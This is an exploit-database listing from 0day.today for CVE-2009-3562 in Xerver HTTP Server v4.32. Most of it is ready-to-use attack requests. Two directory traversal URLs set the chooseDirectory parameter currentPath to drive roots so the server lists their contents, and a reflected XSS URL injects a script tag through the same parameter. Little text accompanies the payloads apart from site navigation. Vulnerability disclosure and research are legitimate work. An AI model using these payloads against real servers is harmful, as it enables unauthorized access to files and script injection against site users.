[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Xerver HTTP Server v4.32 XSS / Directory Traversal Vulnerability

Author
Stack
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9539
Category
remote exploits
Date add
17-09-2009
Platform
unsorted
================================================================
Xerver HTTP Server v4.32 XSS / Directory Traversal Vulnerability
================================================================


# Title: Xerver HTTP Server v4.32 XSS / Directory Traversal Vulnerability
# CVE-ID: (2009-3562)
# OSVDB-ID: (58645)
# Author: Stack
# Published: 2009-09-18
# Verified: yes


view source
print?
Xerver HTTP Server v4.32 XSS / Directory Traversal Vulnerability
 
 
By Stack
 
 
Directory Traversal Exploit :
 
http://127.0.0.1:32123/action=chooseDirectory&currentPath=d:%5C
 
http://127.0.0.1:32123/action=chooseDirectory&currentPath=c:\
 
 
 
 
XSS Exploit :
 
 
http://127.0.0.1:32123/action=chooseDirectory&currentPath='">><script>alert('XSS By Stack')</script>
 



#  0day.today [2024-11-04]  #